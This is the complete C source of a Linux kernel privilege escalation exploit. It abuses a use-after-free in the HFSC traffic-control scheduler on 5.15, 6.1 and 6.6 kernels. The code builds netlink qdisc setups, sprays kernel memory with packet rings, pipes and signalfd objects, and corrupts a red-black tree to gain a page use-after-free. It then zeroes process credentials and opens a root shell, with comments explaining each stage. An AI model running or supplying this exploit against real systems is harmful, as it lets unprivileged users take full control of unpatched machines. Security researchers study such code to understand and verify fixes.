/*
 *    HFSC eltree Use-After-Free exploit (LTS 6.6, COS 6.1, 5.15)
 *      - D3vil (savy@syst3mfailure.io)
*/

#define _GNU_SOURCE

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sched.h>
#include <fcntl.h>
#include <string.h>
#include <byteswap.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netinet/tcp.h>
#include <netinet/in.h>
#include <sys/stat.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <signal.h>
#include <sys/signalfd.h>
#include <sys/resource.h>
#include <sys/utsname.h>

#include "netlink_utils.h"

#define PAGE_SIZE 0x1000

// Sandbox
#define UID_MAP   "/proc/self/uid_map"
#define GID_MAP   "/proc/self/gid_map"
#define SETGROUPS "/proc/self/setgroups"

// Network interfaces
#define ADD_LINK  RTM_NEWLINK
#define DEL_LINK  RTM_DELLINK
#define NO_PRIO 0

// Traffic control
#define ADD_QDISC RTM_NEWQDISC
#define DEL_QDISC RTM_DELQDISC
#define ADD_CLASS RTM_NEWTCLASS
#define DEL_CLASS RTM_DELTCLASS
#define SHOW_CLASS RTM_GETTCLASS

#define TC_H(x, y) (x << 16 | y)

// Packet rings
#define PACKET_TX_RING 13
#define PACKET_VERSION 10
#define TPACKET_V1 0

// Exploitation
#define MAX_RETRIES 5

#define FILE_CRED_OFFSET_6_X 0x70
#define FILE_CRED_OFFSET_5_15 0x90
#define FILE_PRIVATE_DATA_OFFSET 0xc8

#define NUM_DUMMY_NET_IF 0x700
#define KMALLOC_1K_PARTIALS 0x700
#define KMALLOC_512_CHUNK_SIZE 512
#define HFSC_CLASS_ELNODE_OFFSET 0xa0
#define HFSC_CLASS_CHUNK_SIZE 1024 // kmalloc-1k chunk

#define NUM_PGV_BEFORE 0x20
#define NUM_PGV_AFTER 0x40
#define NUM_PGV_TOTAL 0x60
#define NUM_PIPES 0x100
#define NUM_SIGFD 0xa00

enum {
    KVERS_5_15 = 1,
    KVERS_6_X,
};

struct tc_handle {
    char *name;
    void (*func)(struct nlmsghdr *msg, int cmd, void *opt);
};

struct tbf_custom_opt {
    uint32_t burst;
    uint64_t rate64;
};

void tc_handle_tbf(struct nlmsghdr *msg, int cmd, void *opt);
void tc_handle_hfsc(struct nlmsghdr *msg, int cmd, void *opt);
void tc_handle_netem(struct nlmsghdr *msg, int cmd, void *opt);

struct tc_handle tc_handlers[] = {
    { "tbf",   tc_handle_tbf   },
    { "hfsc",  tc_handle_hfsc  },
    { "netem", tc_handle_netem },
};

int assign_to_core(int core_id) {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(core_id, &mask);
    if (sched_setaffinity(getpid(), sizeof(mask), &mask) < 0) {
        perror("[x] sched_setaffinity()");
        return -1;
    }
    return 0;
}

int write_file(char *path, char *data, size_t size) {
    int fd = open(path, O_WRONLY | O_CREAT, 0777);
    if (fd < 0)
        return -1;
    if (write(fd, data, size) < 0) {
        close(fd);
        return -1;
    }
    close(fd);
    return 0;
}

int new_map(char *path, int in, int out) {
    char buff[0x40] = { 0 };
    snprintf(buff, sizeof(buff), "%d %d 1", in, out);
    if (write_file(path, buff, strlen(buff)) < 0) {
        perror("[x] new_map() - write()");
        return -1;
    }
    return 0;
}

void ulimit_max(void) {
    struct rlimit limit;
    if (getrlimit(RLIMIT_NOFILE, &limit) < 0) {
        perror("[x] getrlimit()");
        return;
    }
    limit.rlim_cur = limit.rlim_max;
    if (setrlimit(RLIMIT_NOFILE, &limit) < 0) {
        perror("[x] setrlimit()");
        return;
    }
}

int setup_sandbox(void) {
    int uid = getuid();
    int gid = getgid();
    if (unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET) < 0) {
        perror("unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET)");
        return -1;
    }
    write_file(SETGROUPS, "deny", strlen("deny"));
    new_map(UID_MAP, 0, uid);
    new_map(GID_MAP, 0, gid);
    ulimit_max();
    return 0;
}

int alloc_pg_vec(uint32_t size, uint32_t order) {
    int s = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (s < 0) {
        perror("[x] socket(AF_PACKET)");
        return -1; 
    }
    int version = TPACKET_V1;

    if (setsockopt(s, SOL_PACKET, PACKET_VERSION, &version, sizeof(int)) < 0) {
        perror("[x] setsockopt(PACKET_VERSION)");
        return -1;
    }

    uint32_t block_size = PAGE_SIZE << order;
    struct tpacket_req req = {
        .tp_block_size = block_size,
        .tp_frame_size = PAGE_SIZE,
        .tp_block_nr   = size / sizeof(void *),
    };

    req.tp_frame_nr = (block_size * req.tp_block_nr) / req.tp_frame_size;

    if (setsockopt(s, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req)) < 0) {
        perror("[x] setsockopt(PACKET_TX_RING)");
        return -1;
    }

    return s;
}

char *mmap_pg_vec(int s, size_t size) {
    return (char *)mmap(0, size, PROT_READ|PROT_WRITE, MAP_SHARED, s, 0);
}

int net_if(int cmd, char *type, int num, int flags, int change) {
    struct nlmsghdr *msg;
    struct ifinfomsg ifinfo = {};
    char name[0x100] = { 0 };

    strcpy(name, type);

    if (num >= 0)
        snprintf(name, sizeof(name), "%s-%d", type, num);

    int sk = nl_init_request(cmd, &msg, NLM_F_REQUEST|NLM_F_CREATE);
    if (sk < 0) {
        perror("net_if() - nl_init_request()");
        return -1;
    }

    ifinfo.ifi_family = AF_UNSPEC;
    ifinfo.ifi_type = PF_NETROM;
    ifinfo.ifi_index = (cmd == DEL_LINK) ? if_nametoindex(name) : 0;
    ifinfo.ifi_flags = flags;
    ifinfo.ifi_change = change ? 1 : 0;

    nlmsg_append(msg, &ifinfo, sizeof(ifinfo), NLMSG_ALIGNTO);

    if (cmd == ADD_LINK) {
        struct nlmsghdr *options = nlmsg_alloc();
        nla_put_u32(msg, IFLA_MTU, 65535);
        nla_put_string(msg, IFLA_IFNAME, name);
        nla_put_string(options, IFLA_INFO_KIND, type);
        nla_put_nested(msg, IFLA_LINKINFO, options);
        nlmsg_free(options);
    }

    return nl_complete_request(sk, msg);
}

int tc_init_request(struct nlmsghdr **msg, int cmd, char *name, char *net_if, int handle, int parent, int change) {
    struct tcmsg tchdr = {};
    int flags = NLM_F_REQUEST;

    if (cmd == SHOW_CLASS)
        flags |= NLM_F_DUMP;
    else if (!change)
        flags |= NLM_F_CREATE;

    int sk = nl_init_request(cmd, msg, flags);
    if (sk < 0) {
        perror("tc_prepare_msg() - nl_init_request()");
        return -1;
    }

    tchdr.tcm_family  = AF_UNSPEC;
    tchdr.tcm_ifindex = if_nametoindex(net_if);
    tchdr.tcm_handle  = handle;
    tchdr.tcm_parent  = parent;
    tchdr.tcm_info    = 0;

    nlmsg_append(*msg, &tchdr, sizeof(struct tcmsg), NLMSG_ALIGNTO);
    nla_put_string(*msg, TCA_KIND, name);

    return sk;
}

int tc_complete_request(int sk, struct nlmsghdr *msg) {
    return nl_complete_request(sk, msg);
}

void tc_handle_tbf(struct nlmsghdr *msg, int cmd, void *opt) {
    if (cmd == ADD_QDISC) {
        struct nlmsghdr *options = nlmsg_alloc();
        struct tc_tbf_qopt qopt = { .limit = 10000 };
        uint32_t burst  = 100000;
        uint64_t rate64 = 100000;

        if (opt) {
            struct tbf_custom_opt *custom = (struct tbf_custom_opt *)opt;
            burst = custom->burst;
            rate64 = custom->rate64;
        }

        nla_put(options, TCA_TBF_PARMS, sizeof(qopt), &qopt);
        nla_put_u32(options, TCA_TBF_BURST, burst);
        nla_put_u64(options, TCA_TBF_RATE64, rate64);
        nla_put_nested(msg, TCA_OPTIONS, options);
        nlmsg_free(options);
    }
}

void tc_handle_hfsc(struct nlmsghdr *msg, int cmd, void *opt) {
    if (cmd == ADD_QDISC) {
        struct tc_hfsc_qopt qopt = { .defcls = 0 };

        nla_put(msg, TCA_OPTIONS, sizeof(qopt), &qopt);
    } else if (cmd == ADD_CLASS) {
        struct nlmsghdr *options = nlmsg_alloc();
        struct tc_service_curve copt = { .m2 = 1000 };

        nla_put(options, TCA_HFSC_RSC, sizeof(copt), &copt);
        nla_put_nested(msg, TCA_OPTIONS, options);
        nlmsg_free(options);
    }
}

void tc_handle_netem(struct nlmsghdr *msg, int cmd, void *opt) {
    if (cmd == ADD_QDISC) {
        struct tc_netem_qopt opt = {
            .limit = 1000,
            .duplicate = -1,
        };
        nla_put(msg, TCA_OPTIONS, sizeof(opt), &opt);
    }
}

int tc(int cmd, char *name, char *net_if, int handle, int parent, void *opt, int change) {
    struct nlmsghdr *msg;

    int sk = tc_init_request(&msg, cmd, name, net_if, handle, parent, change);
    if (sk < 0)
        return -1;

    for (int i = 0; i < sizeof(tc_handlers) / sizeof(tc_handlers[0]); i++) {
        if (!strcmp(name, tc_handlers[i].name)) {
            tc_handlers[i].func(msg, cmd, opt);
            break;
        }
    }

    return tc_complete_request(sk, msg);
}

int send_packets(uint8_t *if_name, size_t pkt_size, uint64_t pkt_num, int prio) {
    struct sockaddr_in dst = {};
    struct ifreq ifr = {};

    char *pkt = calloc(1, pkt_size);
    if (!pkt) {
        return -1;
    }

    int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s < 0) {
        perror("[x] socket(SOCK_RAW)");
        free(pkt);
        return -1;
    }

    strncpy(ifr.ifr_name, if_name, IFNAMSIZ);

    if (setsockopt(s, SOL_SOCKET, SO_BINDTODEVICE, ifr.ifr_name, IFNAMSIZ) < 0) {
        perror("[x] setsockopt(SO_BINDTODEVICE)");
        free(pkt);
        close(s);
        return -1;
    }

    if (prio > 0) {
        if (setsockopt(s, SOL_SOCKET, SO_PRIORITY, &prio, sizeof(prio)) < 0) {
            perror("[x] setsockopt(SO_PRIORITY)");
            free(pkt);
            close(s);
            return -1;
        }
    }

    dst.sin_family = AF_INET;
    dst.sin_addr.s_addr = 0xdeadbeef;

    for (uint64_t i = 0; i < pkt_num; i++) {
        memset(pkt, i, pkt_size);
        if (sendto(s, pkt, pkt_size, 0, (struct sockaddr *)&dst, sizeof(dst)) < 0) {
            perror("[x] sendto()");
            free(pkt);
            close(s);
            return -1;
        }
    }

    free(pkt);
    close(s);
    return 0;
}

int alloc_signalfd(int sfd) {
    uint64_t mask = -1;
    int fd = signalfd(sfd, (sigset_t *)&mask, 0);
    if (fd < 0) {
        perror("[x] signalfd()");
        return -1;
    }
    return fd;
}

int get_kernel_version(void) {
    struct utsname buffer;
    if (uname(&buffer) == 0) {
        if (strstr(buffer.release, "6.6"))  return KVERS_6_X;
        if (strstr(buffer.release, "6.1"))  return KVERS_6_X;
        if (strstr(buffer.release, "5.15")) return KVERS_5_15;
        puts("unknown");
        return -1;
    }
    perror("uname");
    return -1;
}

void main(int argc, char *argv[]) {
    char buff[PAGE_SIZE] = { 0 };
    char *pages[NUM_PGV_TOTAL];
    int sigfd[NUM_SIGFD] = { 0 };
    int pipes[NUM_PIPES][2];
    int psocks[NUM_PGV_TOTAL];
    int psock_a, psock_b;
    uint64_t *page_a = NULL;
    uint64_t *page_b = NULL;
    uint64_t *page = NULL;
    uint64_t hfsc_elnode = 0;
    int p = -1;
    struct tbf_custom_opt tbf_custom_opt = { };
    char retries_str[2] = { 0 };
    int retries = argc > 1 ? atoi(argv[1]) : 0;
    int kvers = get_kernel_version();

    size_t pgv_size = KMALLOC_512_CHUNK_SIZE + 8; // Minimum size to allocate a pvg in kmalloc-1k
    size_t total_size = pgv_size / sizeof(void *) * PAGE_SIZE;
    uint64_t hfsc_class_elnode_offset =
        kvers == KVERS_5_15 ? (HFSC_CLASS_ELNODE_OFFSET - 8) : HFSC_CLASS_ELNODE_OFFSET;

    int m = memfd_create("", 0);
    dup2(m, 696);
    close(m);

    assign_to_core(0);
    setup_sandbox();

    net_if(ADD_LINK, "lo", -1, IFF_UP, true);
    net_if(ADD_LINK, "dummy", 0, IFF_UP, true);

    for (int i = 0; i < NUM_PIPES; i++)
        pipe(pipes[i]);

    tbf_custom_opt.burst  = 100;
    tbf_custom_opt.rate64 = 1;
    tc(ADD_QDISC, "tbf",  "lo", TC_H(1, 0), TC_H_ROOT, &tbf_custom_opt, 0);
    tc(ADD_QDISC, "hfsc", "lo", TC_H(2, 0), TC_H(1, 0), NULL, 0);
    send_packets("lo", 64, 2, 0);

    tc(ADD_QDISC, "hfsc", "dummy-0", TC_H(1, 0), TC_H_ROOT, NULL, 0);

    for (int i = 0; i < KMALLOC_1K_PARTIALS; i++)
        tc(ADD_CLASS, "hfsc", "dummy-0", TC_H(1, i + 1), TC_H(1, 0), NULL, 0);

    tc(ADD_CLASS, "hfsc",  "lo", TC_H(2, 1), TC_H(2, 0), NULL, 0);
    tc(ADD_QDISC, "netem", "lo", TC_H(3, 0), TC_H(2, 1), NULL, 0);

    for (int i = 0; i < NUM_PGV_BEFORE; i++)
        psocks[i] = alloc_pg_vec(pgv_size, 0);

    tc(ADD_CLASS, "hfsc",  "lo", TC_H(2, 2), TC_H(2, 0), NULL, 0);

    for (int i = NUM_PGV_BEFORE; i < NUM_PGV_AFTER; i++)
        psocks[i] = alloc_pg_vec(pgv_size, 0);

    send_packets("lo", 64, 2, TC_H(2, 1));

    //
    //                  A (2:1, root)
    //                 /
    //                A (2:1, dupe)
    //

    tc(DEL_CLASS, "hfsc", "lo", TC_H(2, 1), 0, NULL, 0);

    for (int i = NUM_PGV_AFTER; i < NUM_PGV_TOTAL; i++) {
        psocks[i] = alloc_pg_vec(pgv_size, 0);
        pages[i] = mmap_pg_vec(psocks[i], total_size);
        for (int j = 0; j < total_size; j += PAGE_SIZE)
            pages[i][j] = 1; // For each page, fake RB_BLACK __rb_parent_color
    }

    //
    //                 P1
    //                  |
    //                  A (2:1)
    //                 / \
    //            P3 (P)  P2
    //

    send_packets("lo", 64, 1, TC_H(2, 2)); // Insert

    // RBTree now:
    //
    //                  A (2:1)
    //                 / \
    //            P3 (P)  P2
    //                 \
    //                  C (2:2)
    //
    //
    // But if we look it from the P's prospective, the node color is RB_BLACK:
    //
    //
    //                 1 (Fake RB_BLACK)
    //                 ^
    //                 |
    //                 P
    //                  \
    //                   C (2:2)
    //

    for (int i = NUM_PGV_AFTER; i < NUM_PGV_TOTAL; i++) {
        page = (uint64_t *)pages[i];
        if (memchr(page, 0xFF, total_size) != NULL) {
            for (int j = 0; j < total_size / sizeof(void *); j += (PAGE_SIZE / sizeof(void *))) {
                if (page[j + 1] > 1) { // We expect the second qword in the page to be the 2:2 class pointer
                    psock_a = psocks[i];
                    page_a = (uint64_t *)page;
                    hfsc_elnode = page[j + 1]; // C is P->rb_right, so second qword in the page
                    break;
                }
            }
            break;
        }
    }

    if (!hfsc_elnode) {
        tc(DEL_CLASS, "hfsc", "lo", TC_H(2, 2), 0, NULL, 0);
        goto retry;
    }

    // Evil Grandpa infiltrates the rbtree
    uint64_t hfsc_class = hfsc_elnode - hfsc_class_elnode_offset;
    uint64_t target_pgv = hfsc_class + HFSC_CLASS_CHUNK_SIZE; // class 2:2 + 1024, aka the next object in memory
    for (int i = 0; i < total_size; i += PAGE_SIZE)
        *(uint64_t *)((char *)page_a + i) = target_pgv - 0x10;

    //
    //                 E (Evil Grandpa)
    //               / ^
    //              T  |
    //                 P
    //                  \
    //                   C (2:2)
    //

    tc(ADD_CLASS, "hfsc",  "lo", TC_H(2, 2), TC_H(2, 0), NULL, 1); // Update

    // Class 2:2 is deleted:
    //
    //                 E (Evil Grandpa)
    //               / ^
    //              T  |
    //                 P
    //                  \
    //                   x
    //
    // Then re-inserted:
    //
    //                 E (Evil Grandpa)
    //               / ^
    //              T  |
    //                 P
    //                  \
    //                   C (2:2)
    //
    // And the tree rebalanced:
    //
    //                 x
    //                  \
    //                   C (2:2)
    //                  /
    //                 P
    //
    //                   C (2:2)
    //                  / \
    //                 P   E
    //                    /
    //                   T (NULL)
    //

    tc(DEL_CLASS, "hfsc",  "lo", TC_H(2, 2), 0, NULL, 0); // Delete

    // P is moved from C rb_left to E rb_left
    //
    //                 C
    //                / \
    //               x   E
    //                  /
    //                 P (TARGET = P) Pwned!
    //
    // Then class 2:2 is deleted:
    //
    //                 x
    //                  \
    //                   E
    //                  /
    //                 P
    //

    // Find the duplicate page
    for (int i = 0; i < NUM_PGV_AFTER; i++) {
        pages[i] = mmap_pg_vec(psocks[i], total_size); // The page is re-mapped, counter -> 3
        page = (uint64_t *)pages[i];
        if (memchr(page, 0xFF, total_size) != NULL) {
            psock_b = psocks[i];
            page_b = (uint64_t *)page;
            break;
        }
    }

    if (!page_b)
        goto retry;

    munmap(page_a, total_size); // counter = 3 -> 2
    munmap(page_b, total_size); // counter = 2 -> 1
    close(psock_a);             // counter = 1 -> 0 -> free

    // Page reclaimed, counter = 1
    for (int i = 0; i < NUM_PIPES; i++)
        write(pipes[i][1], buff, PAGE_SIZE);

    close(psock_b); // counter = 0 -> free (page-UAF)

    // Get root by setting the task credentials to zero via signalfd4()
    for (int i = 0; i < NUM_SIGFD; i++)
        sigfd[i] = alloc_signalfd(-1);

    page = (uint64_t *)buff;

    // Find the page containing signalfd files
    for (int i = 0; i < NUM_PIPES; i++) {
        read(pipes[i][0], buff, PAGE_SIZE);
        if (memchr(buff, 0xFF, PAGE_SIZE) != NULL) {
            p = i;
            break;
        }
    }

    if (p < 0)
        goto retry;

    uint64_t cred_offset = FILE_CRED_OFFSET_6_X;
    if (!page[FILE_CRED_OFFSET_6_X/sizeof(uint64_t)])
        cred_offset = FILE_CRED_OFFSET_5_15;
    
    uint64_t num_writes = 48 / sizeof(uint16_t) + 1;
    uint64_t file_chunk_size = 0x100;

    uint64_t num_files_per_page = 2; // PAGE_SIZE / file_chunk_size;

    for (int i = 0; i < num_writes; i++) {
        for (int j = 0; j < num_files_per_page; j++) {
            uint64_t file_object_offset = file_chunk_size * j / sizeof(uint64_t);
            uint64_t file_cred_offset = cred_offset / sizeof(uint64_t);
            uint64_t file_private_data_offset = FILE_PRIVATE_DATA_OFFSET / sizeof(uint64_t);

            uint64_t cred = page[file_object_offset +  file_cred_offset];
            page[file_object_offset + file_private_data_offset] = cred + 48 - i * sizeof(uint16_t);

            write(pipes[p][1], page, PAGE_SIZE);
            read(pipes[p][0], page, PAGE_SIZE);

            for (int k = 0; k < NUM_SIGFD; k++)
                alloc_signalfd(sigfd[k]);
        }
    }

    int fd = open("/proc/sys/kernel/modprobe", O_RDWR);
    if (fd < 0)
        goto retry;

    system("PS1=\"r0o0ot # \" /bin/sh");
    exit(0);

retry:
    if (++retries > MAX_RETRIES)
        return;

    for (int i = 0; i < 0x100; i++)
        close(pipes[i][0]);

    for (int i = 0; i < 0xa00; i++)
        close(sigfd[i]);

    printf("retrying (%d/%d)\n", retries, MAX_RETRIES);
    snprintf(retries_str, sizeof(retries_str), "%d", retries);
    char *args[] = { argv[0], retries_str, NULL };
    execv(args[0], args);
}
